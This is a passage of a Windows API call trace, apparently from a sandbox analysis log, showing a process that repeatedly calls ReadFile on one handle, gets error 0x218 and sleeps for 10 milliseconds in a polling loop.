	[0212.770] GetLastError () returned 0x218
	[0212.770] Sleep (dwMilliseconds=0xa) 
	[0212.785] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0212.785] GetLastError () returned 0x218
	[0212.785] Sleep (dwMilliseconds=0xa) 
	[0212.833] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0212.833] GetLastError () returned 0x218
	[0212.833] Sleep (dwMilliseconds=0xa) 
	[0212.879] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0212.879] GetLastError () returned 0x218
	[0212.879] Sleep (dwMilliseconds=0xa) 
	[0212.911] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0212.911] GetLastError () returned 0x218
	[0212.911] Sleep (dwMilliseconds=0xa) 
	[0212.939] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0212.939] GetLastError () returned 0x218
	[0212.940] Sleep (dwMilliseconds=0xa) 
	[0212.941] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0212.941] GetLastError () returned 0x218
	[0212.941] Sleep (dwMilliseconds=0xa) 
	[0212.957] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0212.957] GetLastError () returned 0x218
	[0212.957] Sleep (dwMilliseconds=0xa) 
	[0212.972] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0212.972] GetLastError () returned 0x218
	[0212.973] Sleep (dwMilliseconds=0xa) 
	[0212.988] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0212.988] GetLastError () returned 0x218
	[0212.989] Sleep (dwMilliseconds=0xa) 
	[0213.004] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0213.004] GetLastError () returned 0x218
	[0213.004] Sleep (dwMilliseconds=0xa) 
	[0213.020] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0213.020] GetLastError () returned 0x218
	[0213.020] Sleep (dwMilliseconds=0xa) 
	[0213.066] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0213.066] GetLastError () returned 0x218
	[0213.066] Sleep (dwMilliseconds=0xa) 
	[0213.112] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0213.113] GetLastError () returned 0x218
	[0213.113] Sleep (dwMilliseconds=0xa) 
	[0213.137] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0213.137] GetLastError () returned 0x218
	[0213.137] Sleep (dwMilliseconds=0xa) 
	[0213.144] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0213.144] GetLastError () returned 0x218
	[0213.144] Sleep (dwMilliseconds=0xa) 
	[0213.159] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0213.159] GetLastError () returned 0x218
	[0213.159] Sleep (dwMilliseconds=0xa) 
	[0213.176] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0213.176] GetLastError () returned 0x218
	[0213.176] Sleep (dwMilliseconds=0xa) 
	[0213.191] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0213.191] GetLastError () returned 0x218
	[0213.191] Sleep (dwMilliseconds=0xa) 
	[0213.208] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0213.208] GetLastError () returned 0x218
	[0213.208] Sleep (dwMilliseconds=0xa) 
	[0213.222] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0213.222] GetLastError () returned 0x218
	[0213.222] Sleep (dwMilliseconds=0xa) 
	[0213.237] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0213.237] GetLastError () returned 0x218
	[0213.238] Sleep (dwMilliseconds=0xa) 
	[0213.284] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0213.284] GetLastError () returned 0x218
	[0213.284] Sleep (dwMilliseconds=0xa) 
	[0213.331] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0213.331] GetLastError () returned 0x218
	[0213.331] Sleep (dwMilliseconds=0xa) 
	[0213.363] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0213.363] GetLastError () returned 0x218
	[0213.363] Sleep (dwMilliseconds=0xa) 
	[0213.377] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0213.377] GetLastError () returned 0x218
	[0213.378] Sleep (dwMilliseconds=0xa) 
	[0213.393] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0213.393] GetLastError () returned 0x218
	[0213.393] Sleep (dwMilliseconds=0xa) 
	[0213.409] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0213.409] GetLastError () returned 0x218
	[0213.409] Sleep (dwMilliseconds=0xa) 
	[0213.424] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0213.424] GetLastError () returned 0x218
	[0213.424] Sleep (dwMilliseconds=0xa) 
	[0213.440] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0213.440] GetLastError () returned 0x218
	[0213.440] Sleep (dwMilliseconds=0xa) 
	[0213.457] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0213.457] GetLastError () returned 0x218
	[0213.457] Sleep (dwMilliseconds=0xa) 
	[0213.472] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0213.472] GetLastError () returned 0x218
	[0213.472] Sleep (dwMilliseconds=0xa) 
	[0213.526] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0213.526] GetLastError () returned 0x218
	[0213.527] Sleep (dwMilliseconds=0xa) 
	[0213.565] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0213.565] GetLastError () returned 0x218
	[0213.565] Sleep (dwMilliseconds=0xa) 
	[0213.591] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0213.591] GetLastError () returned 0x218
	[0213.591] Sleep (dwMilliseconds=0xa) 
	[0213.596] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0213.596] GetLastError () returned 0x218
	[0213.596] Sleep (dwMilliseconds=0xa) 
	[0213.622] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0213.623] GetLastError () returned 0x218
	[0213.623] Sleep (dwMilliseconds=0xa) 
	[0213.627] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0213.627] GetLastError () returned 0x218
	[0213.627] Sleep (dwMilliseconds=0xa) 
	[0213.643] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0213.643] GetLastError () returned 0x218
	[0213.643] Sleep (dwMilliseconds=0xa) 
	[0213.658] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0213.658] GetLastError () returned 0x218
	[0213.659] Sleep (dwMilliseconds=0xa) 
	[0213.674] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0213.674] GetLastError () returned 0x218
	[0213.674] Sleep (dwMilliseconds=0xa) 
	[0213.690] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0213.690] GetLastError () returned 0x218
	[0213.690] Sleep (dwMilliseconds=0xa) 
	[0213.736] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0213.736] GetLastError () returned 0x218
	[0213.736] Sleep (dwMilliseconds=0xa) 
	[0213.783] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0213.783] GetLastError () returned 0x218
	[0213.783] Sleep (dwMilliseconds=0xa) 
	[0213.806] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0213.806] GetLastError () returned 0x218
	[0213.806] Sleep (dwMilliseconds=0xa) 
	[0213.814] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0213.814] GetLastError () returned 0x218
	[0213.814] Sleep (dwMilliseconds=0xa) 
	[0213.830] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0213.830] GetLastError () returned 0x218
	[0213.830] Sleep (dwMilliseconds=0xa) 
	[0213.846] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0213.846] GetLastError () returned 0x218
	[0213.846] Sleep (dwMilliseconds=0xa) 
	[0213.861] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0213.862] GetLastError () returned 0x218
	[0213.862] Sleep (dwMilliseconds=0xa) 
	[0213.877] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0213.877] GetLastError () returned 0x218
	[0213.877] Sleep (dwMilliseconds=0xa) 
	[0213.892] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0213.893] GetLastError () returned 0x218
	[0213.893] Sleep (dwMilliseconds=0xa) 
	[0213.927] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0213.927] GetLastError () returned 0x218
	[0213.927] Sleep (dwMilliseconds=0xa) 
	[0213.971] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0213.971] GetLastError () returned 0x218
	[0213.971] Sleep (dwMilliseconds=0xa) 
	[0214.018] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0214.018] GetLastError () returned 0x218
	[0214.018] Sleep (dwMilliseconds=0xa) 
	[0214.039] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0214.039] GetLastError () returned 0x218
	[0214.039] Sleep (dwMilliseconds=0xa) 
	[0214.048] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0214.048] GetLastError () returned 0x218
	[0214.048] Sleep (dwMilliseconds=0xa) 
	[0214.064] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0214.064] GetLastError () returned 0x218
	[0214.064] Sleep (dwMilliseconds=0xa) 
	[0214.079] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0214.079] GetLastError () returned 0x218
	[0214.079] Sleep (dwMilliseconds=0xa) 
	[0214.095] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0214.095] GetLastError () returned 0x218
	[0214.095] Sleep (dwMilliseconds=0xa) 
	[0214.112] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0214.112] GetLastError () returned 0x218
	[0214.112] Sleep (dwMilliseconds=0xa) 
	[0214.127] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0214.127] GetLastError () returned 0x218
	[0214.127] Sleep (dwMilliseconds=0xa) 
	[0214.142] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0214.142] GetLastError () returned 0x218
	[0214.142] Sleep (dwMilliseconds=0xa) 
	[0214.220] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0214.220] GetLastError () returned 0x218
	[0214.220] Sleep (dwMilliseconds=0xa) 
	[0214.266] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0214.266] GetLastError () returned 0x218
	[0214.267] Sleep (dwMilliseconds=0xa) 
	[0214.296] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0214.296] GetLastError () returned 0x218
	[0214.296] Sleep (dwMilliseconds=0xa) 
	[0214.298] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0214.298] GetLastError () returned 0x218
	[0214.298] Sleep (dwMilliseconds=0xa) 
	[0214.313] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0214.313] GetLastError () returned 0x218
	[0214.314] Sleep (dwMilliseconds=0xa) 
	[0214.329] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0214.331] GetLastError () returned 0x218
	[0214.331] Sleep (dwMilliseconds=0xa) 
	[0214.347] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0214.347] GetLastError () returned 0x218
	[0214.347] Sleep (dwMilliseconds=0xa) 
	[0214.361] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0214.361] GetLastError () returned 0x218
	[0214.361] Sleep (dwMilliseconds=0xa) 
	[0214.378] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0214.378] GetLastError () returned 0x218
	[0214.378] Sleep (dwMilliseconds=0xa) 
	[0214.392] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0214.392] GetLastError () returned 0x218
	[0214.392] Sleep (dwMilliseconds=0xa) 
	[0214.470] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0214.470] GetLastError () returned 0x218
	[0214.470] Sleep (dwMilliseconds=0xa) 
	[0214.564] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0214.564] GetLastError () returned 0x218
	[0214.564] Sleep (dwMilliseconds=0xa) 
	[0214.641] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0214.641] GetLastError () returned 0x218
	[0214.641] Sleep (dwMilliseconds=0xa) 
	[0214.688] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0214.688] GetLastError () returned 0x218
	[0214.688] Sleep (dwMilliseconds=0xa) 
	[0215.014] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0215.014] GetLastError () returned 0x218
	[0215.014] Sleep (dwMilliseconds=0xa) 
	[0215.047] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0215.047] GetLastError () returned 0x218
	[0215.047] Sleep (dwMilliseconds=0xa) 
	[0215.203] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0215.203] GetLastError () returned 0x218
	[0215.203] Sleep (dwMilliseconds=0xa) 
	[0215.219] ReadFile (in: hFile=0x240, lpBuffer=0x108f620, nNumberOfBytesToRead=0x400, lpNumberOfBytesRead=0x108f204, lpOverlapped=0x0 | out: lpBuffer=0x108f620, lpNumberOfBytesRead=0x108f204*=0x0, lpOverlapped=0x0) returned 0
	[0215.219] GetLastError () returned 0x218
	[0215.219] Sleep (dwMilliseconds=0xa) 
